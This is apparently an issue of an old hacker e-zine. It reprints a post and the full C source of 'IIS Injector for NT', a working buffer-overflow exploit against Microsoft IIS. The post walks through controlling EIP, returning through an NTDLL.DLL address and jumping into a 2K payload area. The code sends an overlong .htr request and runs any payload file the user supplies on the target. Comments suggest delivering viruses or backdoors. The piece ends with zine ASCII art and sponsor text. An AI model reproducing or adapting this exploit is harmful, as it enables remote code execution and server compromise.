c2=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_, c3=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_, c4=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_, c5=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_, c6=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_, c7=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_, c8=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_, c9=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_, e0=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_, e1=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_, e2=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_, ------------------------------ 4.04 --=\\iss_injector.c.txt\\=-- I read yesturday on eEye.com that they had discovered a buffer overflow in IIS. I could not resist writing an exploit. I did not have time to design a really cool payload for this exploit, so I simply wrote the injection code. However, this is meaningful for several reasons. Attached is the injection code. The exploit will deliver any payload of your choosing. Your payload will be executed. This empowers you to create a "collection" of payloads that are not dependant upon the injection vector in any way. This decoupling is important for military needs, where a single injection vector needs to work, but the "warhead" may be different depending on the targets characterization. The exploit was fairly simple to build. In short, I read on eEye.com that they had overflowed IIS with something like a ~3000 character URL. Within minutes I had caused IIS to crash with EIP under my control. I used a special pattern in the buffer (see code) to make it easy for me to identify where EIP was being popped from. The pattern also made it easy to determine where I was jumping around. Use the tekneek Danielson. ;-) So, I controlled EIP, but I needed to get back to my stack segment, of course. This is old school, and I really lucked out. Pushed down two levels on the stack was an address for my buffer. I couldn't have asked for more. So, I found a location in NTDLL.DLL (0x77F88CF0) that I could return to. It had two pop's followed by a return. This made my injection vector return to the value that was stored two layers down on the stack. Bam, I was in my buffer. So, I landed in a weird place, had to add a near jump to get to somewhere more useful.. nothing special, and here we are with about 2K of payload space. If you don't supply any mobile code to be run, the injection vector will supply some for you. The default payload in simply a couple of no-ops followed by a debug breakpoint (interrupt 3)... It's easy to play with if you want to build your own payloads.. just keep a debugger attached to inetinfo.exe on the target machine. Lastly, I would simply like to point out that monoculture installations are very dangerous. It's a concept from agribusiness.. if you have all one crop, and a virus comes along that can kill that crop, your out of business. With almost ALL of the IIS servers on the net being vulnerable to this exploit, we also have a monoculture. And, it's not just IIS. The backbone of the Internet is built on common router technology (such as cisco IOS). If a serious exploit comes along for the IOS kernel, can you imagine the darkness that will fall? <--- snip // IIS Injector for NT // written by Greg Hoglund // http://www.rootkit.com // // If you would like to deliver a payload, it must be stored in a binary file. // This injector decouples the payload from the injection code allowing you to // create a numnber of different attack payloads. This code could be used, for // example, by a military that needs to attack IIS servers, and has characterized // the eligible hosts. The proper attack can be chosen depending on needs. Since // the payload is so large with this injection vector, many options are available. // First and foremost, virii can delivered with ease. The payload is also plenty // large enough to remotely download and install a back door program. // Considering the monoculture of NT IIS servers out on the 'Net, this represents a // very serious security problem. #include #include #include void main(int argc, char **argv) { SOCKET s = 0; WSADATA wsaData; if(argc < 2) { fprintf(stderr, "IIS Injector for NT\nwritten by Greg Hoglund, " \ "http://www.rootkit.com\nUsage: %s \n", argv[0]); exit(0); } WSAStartup(MAKEWORD(2,0), &wsaData); s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(INVALID_SOCKET != s) { SOCKADDR_IN anAddr; anAddr.sin_family = AF_INET; anAddr.sin_port = htons(80); anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]); if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr))) { static char theSploit[4096]; // fill pattern char kick = 'z'; //0x7a char place = 'A'; // my uber sweet pattern gener@t0r for(int i=0;i<4096;i+=4) { theSploit[i] = kick; theSploit[i+1] = place; theSploit[i+2] = place + 1; theSploit[i+3] = place + 2; if(++place == 'Y') // beyond 'XYZ' { place = 'A'; if(--kick < 'a') kick = 'a'; } } _snprintf(theSploit, 5, "get /"); _snprintf(theSploit + 3005, 22, "BBBB.htr HTTP/1.0\r\n\r\n\0"); // after crash, looks like inetinfo.exe is jumping to the address // stored @ location 'GHtG' (0x47744847) // cross reference back to the buffer pattern, looks like we need // to store our EIP into theSploit[598] // magic eip into NTDLL.DLL theSploit[598] = (char)0xF0; theSploit[599] = (char)0x8C; theSploit[600] = (char)0xF8; theSploit[601] = (char)0x77; // code I want to execute // will jump foward over the // embedded eip, taking us // directly to the payload theSploit[594] = (char)0x90; //nop theSploit[595] = (char)0xEB; //jmp theSploit[596] = (char)0x35; // theSploit[597] = (char)0x90; //nop // the payload. This code is executed remotely. // if no payload is supplied on stdin, then this default // payload is used. int 3 is the debug interrupt and // will cause your debugger to "breakpoint" gracefully. // upon examiniation you will find that you are sitting // directly in this code-payload. if(argc < 3) { theSploit[650] = (char) 0x90; //nop theSploit[651] = (char) 0x90; //nop theSploit[652] = (char) 0x90; //nop theSploit[653] = (char) 0x90; //nop theSploit[654] = (char) 0xCC; //int 3 theSploit[655] = (char) 0xCC; //int 3 theSploit[656] = (char) 0xCC; //int 3 theSploit[657] = (char) 0xCC; //int 3 theSploit[658] = (char) 0x90; //nop theSploit[659] = (char) 0x90; //nop theSploit[660] = (char) 0x90; //nop theSploit[661] = (char) 0x90; //nop } else { // send the user-supplied payload from // a file. Yes, that's a 2K buffer for // mobile code. Yes, that's big. FILE *in_file; in_file = fopen(argv[2], "rb"); if(in_file) { int offset = 650; while( (!feof(in_file)) && (offset < 3000)) { theSploit[offset++] = fgetc(in_file); } fclose(in_file); } } send(s, theSploit, strlen(theSploit), 0); } closesocket(s); } } ------------------------------ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- . Quote #3- . . . . "Hey anyone need an easy way to make $50?" . . -JayPee . . . . Quote made up by Lord Oak. . -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Please go to: www.thepoison.org/popup.html and click on our sponsors because we have to pay the bills someway! It doesn't cost you anything (except 10 seconds) to go there and click on it. _|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| _| _| _| _| _| _| _| _| _| _| _| _| _| _|_| _| _|_| _| _| _| _|_|_|_| _| _| _| _| _| _| _| _| _| _| _| _|_| _| _|_| _| _| _| _| _| _| _| _| _| _| Antidote is an HNN Affiliate _| _| http://www.hackernews.com _| _| _| _|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| All ASCII art in this issue is done by Lord Oak [lordoak@thepoison.prg] and permission is needed before using.